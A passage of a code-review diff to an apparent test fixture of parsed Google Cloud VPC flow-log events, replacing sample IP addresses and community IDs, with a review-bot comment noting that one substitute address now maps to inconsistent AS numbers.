name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:47:10.514594429Z", "end": "2019-06-14T03:47:10.630345069Z", @@ -25168,9 +25168,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65277, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -25184,7 +25184,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:YSvKG93X/zXgdEB409IbjBJVQFw=", + "community_id": "1:4WmFG6CwXYT/gPzUmmljpbE3pFk=", "bytes": 51612, "transport": "tcp", "type": "ipv4", @@ -25199,7 +25199,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -25223,8 +25223,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869322600Z", - "original": "{\"insertId\":\"14iipwlfd8t017\",\"jsonPayload\":{\"bytes_sent\":\"51612\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65277,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"95\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392583600Z", + "original": 
"{\"insertId\":\"14iipwlfd8t017\",\"jsonPayload\":{\"bytes_sent\":\"51612\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65277,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"95\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760385211Z", "end": "2019-06-14T03:49:56.316890309Z", @@ -25253,17 +25253,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65272, "bytes": 74330, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 745 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Oo7JpkYAgptDkVqBTaGUMnHqiYQ=", + "community_id": "1:AkP1aSEJH9bFKIOkOHf1rOVHNwk=", "bytes": 74330, "transport": "tcp", "type": "ipv4", @@ -25277,7 +25277,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -25302,8 +25302,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869325200Z", - "original": "{\"insertId\":\"14iipwlfd8t01m\",\"jsonPayload\":{\"bytes_sent\":\"74330\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65272},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"123\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392589100Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01m\",\"jsonPayload\":{\"bytes_sent\":\"74330\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65272},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"123\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.403442252Z", "end": "2019-06-14T03:49:56.316981133Z", @@ -25324,9 +25324,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 59924, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -25340,7 +25340,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:T0Rv8TiMkVLDs+lIQf8LeL2yG4A=", + "community_id": "1:6chxyTuZx655lb71dq3THmRLfyY=", "bytes": 1784, "transport": "tcp", "type": "ipv4", @@ -25355,7 +25355,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { 
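Review bot: 67.43.156.13 now stands in for three formerly distinct peers (203.0.113.12, 203.0.113.58 and 203.0.113.134), so the same destination IP is paired with `"number": 15169` in this hunk (@@ -25324) but with `"number": 33652` in hunk @@ -25168, and again with 15169 in @@ -25792 and @@ -25890. The AS and geo values appear to be copied from the payload's `dest_location`/`src_location` rather than looked up, so the expected output still matches, but the fixture no longer models a coherent host-to-ASN mapping and any future assertion that the pipeline's ASN enrichment agrees with the payload would be contradicted by this data. Keeping one substitute per original address (a distinct host in the supported 67.43.156.0/24 range for each of the three) would preserve the one-to-one mapping the fixture had before. This hunk starts mid-record; the enclosing event object begins before it.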
@@ -25379,8 +25379,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869327900Z", - "original": "{\"insertId\":\"14iipwlfd8t015\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":59924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392594600Z", + "original": 
"{\"insertId\":\"14iipwlfd8t015\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":59924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:41:08.092659117Z", "end": "2019-06-14T03:41:08.213471928Z", @@ -25403,9 +25403,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65273, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -25419,7 +25419,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:12d2Qz5iuI+gHCcFYKHiK+jTFKY=", + "community_id": "1:f+7WLGF1FDb2ZMudfLtDGfB3+gQ=", "bytes": 76622, "transport": "tcp", "type": "ipv4", @@ -25434,7 +25434,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -25458,8 +25458,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869330500Z", - "original": "{\"insertId\":\"14iipwlfd8t01h\",\"jsonPayload\":{\"bytes_sent\":\"76622\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65273,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"599\",\"reporter\":\"SRC\",\"rtt_msec\":\"115\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392600100Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01h\",\"jsonPayload\":{\"bytes_sent\":\"76622\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65273,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"599\",\"reporter\":\"SRC\",\"rtt_msec\":\"115\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.155378287Z", "end": "2019-06-14T03:49:56.316930467Z", @@ -25488,17 +25488,17 @@ "as": { "number": 4847 }, - "address": "192.0.2.73", + "address": "192.168.2.73", "port": 45224, "bytes": 42, - "ip": "192.0.2.73", + "ip": "192.168.2.73", "packets": 5 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:rKlCjiIPAcL1SMVo+HVqssXpCbA=", + "community_id": "1:ppuocaYwNMzpWOs4nDw/orHgE7E=", "bytes": 42, "transport": "tcp", "type": "ipv4", @@ -25512,7 +25512,7 @@ }, "related": { "ip": [ - "192.0.2.73", + "192.168.2.73", "10.73.186.17" ] }, 
@@ -25537,8 +25537,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869333200Z", - "original": "{\"insertId\":\"14iipwlfd8t019\",\"jsonPayload\":{\"bytes_sent\":\"42\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.0.2.73\",\"src_port\":45224},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:24.922448897Z\",\"packets_sent\":\"5\",\"reporter\":\"DEST\",\"rtt_msec\":\"242\",\"src_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392605600Z", + "original": 
"{\"insertId\":\"14iipwlfd8t019\",\"jsonPayload\":{\"bytes_sent\":\"42\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.73\",\"src_port\":45224},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:24.922448897Z\",\"packets_sent\":\"5\",\"reporter\":\"DEST\",\"rtt_msec\":\"242\",\"src_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:42:23.705320616Z", "end": "2019-06-14T03:42:24.922448897Z", @@ -25567,17 +25567,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65277, "bytes": 75263, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 729 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:YSvKG93X/zXgdEB409IbjBJVQFw=", + "community_id": "1:4WmFG6CwXYT/gPzUmmljpbE3pFk=", "bytes": 75263, "transport": "tcp", "type": "ipv4", @@ -25591,7 +25591,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -25616,8 +25616,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869335900Z", - "original": "{\"insertId\":\"14iipwlfd8t016\",\"jsonPayload\":{\"bytes_sent\":\"75263\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65277},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"729\",\"reporter\":\"DEST\",\"rtt_msec\":\"95\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392611300Z", + "original": 
"{\"insertId\":\"14iipwlfd8t016\",\"jsonPayload\":{\"bytes_sent\":\"75263\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65277},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"729\",\"reporter\":\"DEST\",\"rtt_msec\":\"95\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760385211Z", "end": "2019-06-14T03:49:56.316890309Z", @@ -25638,9 +25638,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 34646, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -25654,7 +25654,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:gHx32lWIBcmVoqmKyPEO+iRlC3Q=", + "community_id": "1:8IBpMmKYBYXp/c1Nzms8rg6CQs0=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -25669,7 +25669,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { 
@@ -25690,8 +25690,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869338400Z", - "original": "{\"insertId\":\"14iipwlfd8t01c\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":34646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:10.529592195Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:10.413494375Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392616800Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01c\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":34646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:10.529592195Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:10.413494375Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:48:10.413494375Z", "end": "2019-06-14T03:48:10.529592195Z", @@ -25718,17 +25718,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 34646, "bytes": 1467, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:gHx32lWIBcmVoqmKyPEO+iRlC3Q=", + "community_id": "1:8IBpMmKYBYXp/c1Nzms8rg6CQs0=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -25742,7 +25742,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -25764,8 +25764,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869341200Z", - "original": "{\"insertId\":\"14iipwlfd8t01d\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":34646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:10.529541195Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:10.413397239Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392622300Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01d\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":34646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:10.529541195Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:10.413397239Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:48:10.413397239Z", "end": "2019-06-14T03:48:10.529541195Z", @@ -25792,18 +25792,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33876, "bytes": 5044, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 87 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:dURBkayd+umbcZOJIS7+sTQjLag=", + "community_id": "1:E5NvH5JkoYJgVzpBa96RbCFEXPs=", "bytes": 5044, "name": "default", "transport": "tcp", @@ -25825,7 +25825,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -25862,8 +25862,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869343700Z", - "original": "{\"insertId\":\"14iipwlfd8t01g\",\"jsonPayload\":{\"bytes_sent\":\"5044\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33876},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933154111Z\",\"packets_sent\":\"87\",\"reporter\":\"DEST\",\"rtt_msec\":\"34\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466868771Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\"